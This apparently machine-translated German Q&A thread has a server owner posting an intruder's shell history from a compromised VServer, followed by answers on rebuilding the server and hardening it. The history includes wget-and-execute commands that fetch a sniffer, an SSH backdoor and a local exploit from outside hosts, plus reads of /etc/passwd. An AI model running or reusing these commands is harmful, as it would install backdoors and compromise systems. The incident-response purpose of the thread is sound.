SSH Backdoor auf VServer gefunden. Was ist zu tun?


24

Gestern habe ich meinen Befehlsverlauf auf meinem VServer überprüft. Ich habe mehrere verdächtige Zeilen gefunden.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Besonders die sniffer.tgz hat mich geschockt. Ich habe eine virtuelle Maschine eingerichtet und dieses TGZ-Archiv heruntergeladen. Ich habe das Setup gestartet und es gab mir folgende Zeilen:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Weiß jemand, wie man das entfernt?


Antworten:


66

Dies ist, was Sie auf allen Systemen tun sollten, auf denen Sie dies hatten sniffer.tgz: Nuke Them From Orbit sofort , und von einer sauberen Installation beginnen. (Das heißt, zerstören Sie die Systeme, installieren Sie sauber neu, laden Sie Daten aus sauberen Sicherungen - vorausgesetzt, Sie haben saubere Sicherungen und härten Sie die Systeme, bevor Sie sie wieder ins Internet stellen.)

Immer wenn Malware oder Hacker auf diese Weise in Ihr System eindringen, ist es an der Zeit, die Konfiguration Ihres Systems erneut zu analysieren und nicht die gleichen Schritte zu wiederholen, mit denen sie sich befasst haben. Da dies jedoch möglicherweise kein System ist, das Sie beiseite nehmen und forensisch analysieren können, und da dies möglicherweise Ihr einziger Server ist, ist es an der Zeit , das virtuelle System einfach zu zerstören und von vorne zu beginnen (wie oben erwähnt).

(Dies gilt auch für Situationen, in denen Malware auf dem System vorhanden ist. Wenn Sie keine Ersatzhardware haben, um das beschädigte System zu isolieren und forensisch zu untersuchen, was die meisten Benutzer normalerweise nicht haben, haben Sie jedoch keine andere Wahl um das System zu zerstören und von vorne zu beginnen.)

Ohne Ihren Server zu analysieren, kann ich nicht wirklich sagen, was Sie falsch gemacht haben, aber es ist wahrscheinlich, dass diese Hintertür tiefer im System liegt als nur ein einfaches 'Programm', das installiert wurde. Und da die bösen Jungs bereits eine Hintertür auf Ihrem System installieren mussten, können Sie davon ausgehen, dass alle Ihre Passwörter jetzt verletzt und nicht mehr sicher sind (sei es für SSH, MySQL-Root oder andere Arten von Passwörtern, die EVER haben) in dieses Computersystem eingegeben wurden). Zeit, alle Ihre Passwörter zu ändern !


Sobald Sie wieder in einer sauberen Umgebung sind, finden Sie hier einige grundlegende Tipps zu den zu berücksichtigenden Härtungsschritten. Beachten Sie, dass ich hier nicht näher auf Details eingehen kann, da dies das Thema viel umfassender macht. Es ist jedoch definitiv an der Zeit, einige Schritte zum Schutz Ihres Systems auszuführen:

  1. Aktivieren Sie eine Firewall und erlauben Sie nur den Zugriff auf Ports, die geöffnet werden müssen . ufwexistiert, um einfach zu sein, also lasst uns das benutzen. sudo ufw enable. (Richtige Konfiguration ufwfür Ihre Umgebung ist eine andere Geschichte, und das geht über die Grenzen dieser Frage hinaus.)

  2. Beschränken Sie den Zugriff auf Remote-SSH . Dies ist nicht immer machbar, aber Sie würden im Idealfall IP-Adressen identifizieren, deren Eigentümer Sie sind, und diese in der Firewall auf eine Whitelist setzen. (Wenn Sie eine dynamische Privat-IP-Adresse haben, überspringen Sie diesen Schritt.)

  3. Sperren Sie den SSH-Zugriff auf Ihren Server , und verwenden Sie SSH-Schlüssel nur zur Authentifizierung . Auf diese Weise können Hacker Ihren Server nicht angreifen und versuchen, Passwörter zu erraten . Es ist sehr viel schwieriger, den richtigen privaten Schlüssel zu erraten (weil Sie alle bruteforce müssten), und dies hilft, sich vor bruteforcing-Angriffen zu schützen.

  4. Wenn Sie eine Website betreiben, stellen Sie sicher, dass Sie die Berechtigungen sperren, damit Benutzer keine Dinge nach Belieben hochladen oder ausführen können . Da dies von Standort zu Standort unterschiedlich ist, kann ich Ihnen hier keine weiteren Anweisungen geben (dies ist unmöglich).

  5. Auch wenn Sie eine Website mit Joomla oder Wordpress oder ähnlichem betreiben, stellen Sie sicher, dass Sie die Umgebung auf dem neuesten Stand halten und über Sicherheitslücken der Softwareanbieter verfügen .

  6. Richten Sie nach Möglichkeit 2FA-Methoden (Two-Factor Authentication) für Dinge ein, mit denen Sie sich authentifizieren . Es gibt viele Lösungen für die Zweitfaktorauthentifizierung für verschiedene Anwendungen, und das Sichern verschiedener Anwendungen auf diese Weise würde den Rahmen dieses Beitrags sprengen. Sie sollten sich daher mit diesem Punkt befassen, bevor Sie eine Lösung auswählen.

  7. Wenn Sie in Ihrem Setup unbedingt Passwörter verwenden müssen , verwenden Sie einen anständigen Passwort-Manager (Cloud-basierte sind nicht unbedingt eine gute Wahl) und verwenden Sie zufällige, nicht speicherbare Passwörter mit einer Länge von mehr als 25 Zeichen, die für jedes einzelne Objekt unterschiedlich sind durch Passwörter gesichert (daher die Empfehlung für den Passwort-Manager). (Sie sollten jedoch nachdrücklich in Erwägung ziehen, nach Möglichkeit KEINE Kennwörter zu verwenden (z. B. für die SSH-Authentifizierung) und nach Möglichkeit 2FA zu verwenden.)


Kommentare sind nicht für eine längere Diskussion gedacht. Diese Unterhaltung wurde in den Chat verschoben .
Terdon

Ich akzeptierte die Antwort, da ich dies tun werde. Ich versuche niemals, die Backdoor an der VM zu schließen, nur für mein persönliches Interesse.
Itskajo

0

Wenn es eine Hintertür gibt, gibt es 3 weitere. Daten isolieren, sichern, nuklearisieren und sorgfältig wiederherstellen. Achten Sie darauf, dass keine cron-, php- oder sogar mysql-Daten vorhanden sind. Alle könnten kompromittiert werden. Denken Sie daran, dass sie zu diesem Zeitpunkt alle Ihre Passwörter und Hashes haben. Wenn Sie also andere Maschinen ähnlich konfiguriert haben, haben sie diese wahrscheinlich auch gehackt. Wenn WordPress nach Malware in Plugins / Themes usw. sucht ... Überprüfen Sie Ihre Berechtigungen, möglicherweise haben Sie 777 überall. Keine einfache Antwort, Sie suchen eine Menge Arbeit.


Es gibt nicht unbedingt mehr als eine, wie oft oder wahrscheinlich es auch sein mag, dass dies hier nicht der Fall ist. Und sie haben möglicherweise nicht alle ihre Passwörter sicher. Es ist auch nicht "wahrscheinlich", dass sie andere Maschinen gehackt haben, Sie wissen nicht, was sie vorhaben oder was beschnüffelt wurde oder ob das fehlerhafte Programm überhaupt aktiviert wurde, ohne dass es vorhanden war oder auf irgendeine Weise ausgeführt wurde. Und "Daten sorgfältig wiederherstellen" ist ein sehr allgemeiner Ratschlag für etwas, das sehr sorgfältige Maßnahmen erfordert.
James
Durch die Nutzung unserer Website bestätigen Sie, dass Sie unsere Cookie-Richtlinie und Datenschutzrichtlinie gelesen und verstanden haben.
Licensed under cc by-sa 3.0 with attribution required.